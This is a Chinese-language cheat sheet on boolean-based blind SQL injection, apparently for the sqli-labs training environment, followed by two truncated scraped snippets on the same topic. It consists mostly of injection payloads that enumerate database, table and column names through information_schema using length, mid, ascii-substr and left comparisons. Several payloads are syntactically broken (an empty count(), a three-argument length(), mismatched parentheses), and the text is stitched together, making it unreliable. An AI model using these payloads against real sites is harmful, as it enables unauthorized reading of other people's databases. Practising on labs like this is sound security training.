步驟:猜資料庫名字長度--猜資料庫名字 --猜表單數量--猜表單名字長度 --猜表單名字--猜欄位數量--猜字段長度--猜欄位
1 and length(database())>3
1 and mid(database(),1,1)='a' //用substr函式也行
1 and ascii(substr((select database()),1,1))='數字'
1 and left(database(),4)='sqli' //判斷字串
1 and 1=((select count() from information_schema.tables where table_schema='sqli')<3)
1 and length((select table_name from information_schema.tables where table_schema='sqli'),0,1)=3
1 and mid((select table_name from information_schema.tables where table_schema='sqli'),1,1)='s'
1 and left((select table_name from information_schema.tables where table_schema='sqli'),4)='sqlli'
1 and ascii(substr((select table_name from information_schema.tables where table_schema='sqli'),1,1)='數字'
SQL注入 布林注入
條件 當乙個頁面,存在注入,沒顯示位,沒有輸出sql語句執行錯誤資訊,只能通過頁面返回正常不正常進行判斷進行sql注入。例如 string sql null string a admin or 1 1 string b abc sql select from user where username ...
github audi 1 sqli labs sqli labs 爆庫名select database 爆表名select group concat table name from information schema.tables where table schema database 爆列名s...
